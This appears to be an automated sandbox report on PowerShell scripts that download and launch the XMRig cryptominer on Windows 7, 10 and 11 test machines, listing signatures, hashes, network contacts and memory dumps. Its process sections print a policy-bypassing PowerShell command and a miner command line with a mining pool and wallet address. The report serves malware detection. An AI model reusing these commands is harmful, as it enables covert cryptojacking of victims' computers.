memory/2440-80-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-81-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-82-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-83-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-84-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-85-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-86-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-87-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-88-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-89-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-90-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-91-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-92-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-93-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-94-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-95-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-96-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-97-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-98-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-99-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-100-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-101-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-102-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-103-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-104-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-105-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-106-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-107-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-108-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-109-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-110-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-111-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-112-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-113-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-114-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-115-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-116-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

memory/2440-117-0x00007FF6B1A80000-0x00007FF6B26B3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:58

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 227.162.46.104.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/164-3-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/164-5-0x0000014AF1550000-0x0000014AF1572000-memory.dmp

memory/164-8-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-10-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-9-0x0000014AF1700000-0x0000014AF1776000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm4byoi4.cky.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/164-25-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-48-0x0000014AF16E0000-0x0000014AF16F2000-memory.dmp

memory/164-61-0x0000014AF16C0000-0x0000014AF16CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5000-90-0x0000023AA9700000-0x0000023AA9720000-memory.dmp

memory/5000-91-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/164-92-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-93-0x00007FF9DE723000-0x00007FF9DE724000-memory.dmp

memory/5000-94-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/164-95-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/5000-96-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-97-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-98-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-99-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-100-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-101-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-102-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-103-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-104-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-105-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-106-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-107-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-108-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-109-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-110-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-111-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-112-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-113-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-114-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-115-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-116-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-117-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-118-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-119-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-120-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-121-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-122-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-123-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-124-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-125-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-126-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-127-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-128-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-129-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-130-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-131-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-132-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-133-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-134-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-135-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-136-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-137-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-138-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-139-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-140-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-141-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-142-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-143-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-144-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-145-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-146-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-147-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-148-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-149-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-150-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-151-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-152-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-153-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-154-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-155-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

memory/5000-156-0x00007FF773770000-0x00007FF7743A3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:03

Platform

win10-20240611-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 74.239.69.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/2008-2-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

memory/2008-5-0x0000026754AB0000-0x0000026754AD2000-memory.dmp

memory/2008-6-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-10-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-9-0x000002676D1C0000-0x000002676D236000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5p2uyzdb.xsm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2008-26-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/2008-49-0x000002676E350000-0x000002676E362000-memory.dmp

memory/2008-62-0x0000026754B40000-0x0000026754B4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4572-91-0x0000028377900000-0x0000028377920000-memory.dmp

memory/2008-92-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

memory/2008-93-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/4572-94-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/2008-95-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

memory/4572-96-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-97-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-98-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-99-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-100-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-101-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-102-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-103-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-104-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-105-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-106-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-107-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-108-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-109-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-110-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-111-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-112-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-113-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-114-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-115-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-116-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-117-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-118-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-119-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-120-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-121-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-122-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-123-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-124-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-125-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-126-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-127-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-128-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-129-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-130-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-131-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-132-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-133-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-134-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-135-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-136-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-137-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-138-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-139-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-140-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-141-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-142-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-143-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-144-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-145-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-146-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-147-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-148-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-149-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-150-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-151-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-152-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-153-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-154-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-155-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-156-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

memory/4572-157-0x00007FF757A90000-0x00007FF7586C3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 07:56

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1566s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"

Network

N/A

Files

memory/2952-4-0x000007FEF5BEE000-0x000007FEF5BEF000-memory.dmp

memory/2952-7-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2952-5-0x000000001B880000-0x000000001BB62000-memory.dmp

memory/2952-8-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-9-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-10-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

memory/2952-11-0x000007FEF5930000-0x000007FEF62CD000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-07-04 03:15

Reported

2024-07-04 08:14

Platform

win11-20240611-en

Max time kernel

1791s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

